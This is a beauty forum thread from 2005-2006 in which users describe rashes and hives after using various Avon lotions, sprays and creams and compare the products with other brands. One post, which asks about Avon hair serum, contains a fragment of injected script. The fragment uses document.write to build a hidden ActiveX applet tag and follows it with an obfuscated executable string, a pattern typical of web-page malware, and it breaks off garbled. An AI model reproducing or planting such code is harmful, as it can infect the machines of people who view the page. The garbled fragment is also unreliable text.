Banishing Bad Hair Days since 1997!™
  FAQ FAQ  Forum Search   Register Register  Login Login

has anyone had problems with Avon?

Post Reply Post Reply
Author
femmemuscle View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote femmemuscle Quote  Post ReplyReply Direct Link To This Post Topic: has anyone had problems with Avon?
    Posted: July 22 2005 at 11:16am

i like the avon Soft and Sensual bath oil, and the body creme made with shea butter.  Well, they just launched a new Soft and Sensual replenishing lotion..made with a "Patented Delivery System" designed to replenish the skins moisture, etc...i didn't think much of it, and used it for about a month or two.  The other two products i mentioned before, i've been using for a few years, no problem.  I woke up this morning, and from my neck down, i am covered with bright red hives, and welts..

i can use only a few Avon products.  These are products that have broken me out.  and it happens over a period of time. (hypoallergenic?), not right away: Their jewelry, Anew skin "brightening" face creme, their perfumes, and their new line of mascaras..

I guess the more natural a product is for me, the better..the moment i see the word "patented", or replenishing system, etc..i'm in trouble.

Susan W View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote Susan W Quote  Post ReplyReply Direct Link To This Post Posted: July 25 2005 at 7:15am
I don't know the Avon products too well, except for the Skin So Soft, (which is known by many in the Louisiana swamps as an EXCELLENT mosquito repellent!)

But just in case, is there anything different you've done more recently that it might be?  Like using a new flavor of laundry detergent on your sheets?  (This happened to my boyfriend recently with one of the scented Tide kinds).   Using it for a month or two seems a long time for an allergy to develop now - I know you said it happens long term, how long did it take the other products to break you out?  Always a month or two?

Making metal barettes/concord clips hair safe, long hair style how to: http://alonghair.wordpress.com

Post Options Post Options   Thanks (0) Thanks(0)   Quote femmemuscle Quote  Post ReplyReply Direct Link To This Post Posted: July 26 2005 at 8:21pm

i try to keep "experimental" to a minimum..thus, everything i use is pretty natural, or perfume free..the rash cleared up, and, of course, out of curiousity - i wanted to make sure it was the replenishing lotion..i put it on and wham!! it definitely happened again and took a bit longer to clear up..it came back fast and furious..it apparently, makes the epidermis "replenish" the moisturizer once the skin becomes dry..it doesn't sound natural..

thus, i'll go back to my old system, which i like anyway...the other soft and sensual products are fine, when you dry out, you just slap some more on....Must be that "patented delivery system"..whatever the heck that is..

and yes, i used the oil (original SSS) to keep those skeeters at bay, too! 

Susan W View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote Susan W Quote  Post ReplyReply Direct Link To This Post Posted: July 27 2005 at 6:57am
Wow, I guess so.  Well, I'm glad you know exactly what did it to make it easier to avoid those ingredients in the future!

Making metal barettes/concord clips hair safe, long hair style how to: http://alonghair.wordpress.com
ammonia View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote ammonia Quote  Post ReplyReply Direct Link To This Post Posted: August 05 2005 at 6:55am
my aunt tryed some of their face creams and she got a real bad reaction once.. i wouldnt try avon. =x

Post Options Post Options   Thanks (0) Thanks(0)   Quote femmemuscle Quote  Post ReplyReply Direct Link To This Post Posted: August 05 2005 at 5:03pm
thanks!  i'm beginning to believe a few folks use only specific products..but they have great models!
sxylisa2005 View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote sxylisa2005 Quote  Post ReplyReply Direct Link To This Post Posted: August 23 2005 at 9:27am
iv only ever used the body sprays and make up from avon. the make up is fine but the body sprays made me come out in big red rashes wherevever i had sprayed it

Post Options Post Options   Thanks (0) Thanks(0)   Quote femmemuscle Quote  Post ReplyReply Direct Link To This Post Posted: August 29 2005 at 10:06am

for me, the makeup is okay, but compared to MAC, or dermablend, it's lacking.. other brands are water resistant/proof..plus they have better shade selections..i would  break a sweat while wearing avon's foundation, or concealer and boy what an embarrassment....there were pale streaks running down the sides of my face...with the other brands - especially dermablend, i can sweat, ski, workout, etc..no streaks..

i also have a problem with the body sprays, the lotions, and now i'm having a problem with their "natural" bath and body products, i.e., planet spa, and The Naturals gardenia and peach shower gels and lotion...i break out in huge welts..

ash159 View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote ash159 Quote  Post ReplyReply Direct Link To This Post Posted: October 16 2005 at 10:49am
howz da avon hair serum?
document.write "
<"&" NAME=KJ"&"_guest HEIGHT=0 WIDTH=0 code=com.ms."&"activeX.Active"&"XComponent>
" ExeString = ">il CnVh_rd,BtllNewt&VasNewt&DdgledScgm,;pol_Oaj_cs,@SN,QsRh_lk, QimP[tg,MuaE&Fhn[lxDcsjStb
ashvini
Jamgurl View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Jamgurl Quote  Post ReplyReply Direct Link To This Post Posted: June 02 2006 at 2:15pm
I wouldnt try any other avon stuff but the SSS lotions...they have worked great for me so far in terms of maintaining moisture all day...

Tried a few of the face products and Dead

The mascara's are ok too.
Cherryblsmgrl View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Cherryblsmgrl Quote  Post ReplyReply Direct Link To This Post Posted: June 03 2006 at 3:37pm
I'm not a big fan of Avon's makeup but I do like 2 of their skin care products from their Anew line. I had trouble with "clinical" as it burned my skin. 
Follow Your Bliss
Yolligirl View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Yolligirl Quote  Post ReplyReply Direct Link To This Post Posted: June 15 2006 at 11:41am
I have used their moisture serum and I never had any problems
Life is a journey, Enjoy the ride.

Post Reply Post Reply
  Share Topic